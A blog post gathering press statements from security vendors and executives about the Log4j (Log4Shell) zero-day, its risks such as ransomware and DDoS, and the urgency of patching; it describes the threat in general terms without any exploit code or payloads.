One of the more difficult things I do concerns filtering press releases to figure out which are hype and which have some enduring relevance. The first one I received about the Log4J exploit seemed over the top. However, this one appears to have legs. Best practices tell us to take action and be concerned. Following are a number of statements from security leaders. Take note of these.
This from my host platform, Cloudflare, “Last Friday we sent you an email about a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228). We advised you that Cloudflare had immediately updated our WAF to help protect you against this vulnerability. We also recommended that all organizations that use Log4j immediately update to the newest version to mitigate exploit attacks. The latest version can be found at the Log4j download page.”
Glen Pendley, Deputy CTO at Tenable, “Log4Shell, a critical vulnerability in Apache Log4j, shines a bright light on the risky practice of relying on open-source code libraries to build enterprise-scale applications. Many organizations around the world rely on open-source libraries as a key element in their ability to bring applications to market quickly. Yet, these libraries often stop short of a security-first approach. This dependence on what is effectively a wild, wild west of code libraries will continue to leave organizations vulnerable until time and resources are invested to make them more secure.”
And from Paul Laudanski, Head of Threat Intelligence at Tessian, “The log4j vulnerability has created endless golden opportunities for bad actors – and they know it and are getting creative. What they’re trying to do now is build an arsenal of tools that they can use across the globe for theft and service disruption, especially ahead of the holiday season. DDoS attacks in particular are a top concern, as exploitation could allow bad actors to download, install and then fully control an army of botnets. DDoS operators can then focus on attacks that bring down critical infrastructure – ranging from utilities to power grid – and especially retailers ahead of the holiday season, a time when people are notoriously distracted, tired and more prone to making security mistakes. Couple that with an increase in moratoriums, when no code is released into production, so emergency patches would require a break of that moratorium.
Meanwhile, there’s also the concern that the original CVE will end up generating subsequent CVEs, potentially exponentially multiplying its impact, similarly to the follow-on bugs we saw after SolarWinds. Luckily, log4j only has one in 2021 so far, but I wouldn’t be surprised if other related flaws are found soon. However, it’s worth noting one silver lining: white hats are working tirelessly to train folks on how to identify the vulnerability, so most teams will now be properly educated and informed on the growing threat.”
From the blog of Nozomi Networks, “At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE). Coupled with the popularity of this tool, multiple companies and commercial applications have become affected by it. It received a codename Log4Shell. In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and became aware of all potential global scans and exploitation attempts.”
“Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.”
Further from Amit Yoran, Chairman and CEO, Tenable, “Just as we warned, Log4Shell is unleashing holy hell on businesses everywhere. And the worst is yet to come if organizations don’t take immediate action.
Researchers are already observing ransomware activities as cybercriminals begin utilizing Log4Shell in their playbooks. Let me be clear, these ransomware activities are not going to go away – they will only increase like wildfire thanks in part to this new, perfect payload in the form of Log4Shell. Organizations need to take swift and decisive action as Log4Shell can and will completely undermine your security program.
No vendor’s product is a silver bullet to solve this problem. Eliminating the threat posed by Log4Shell requires hard work and time to understand this vulnerability and how it will morph and evolve over time to bypass protective measures.”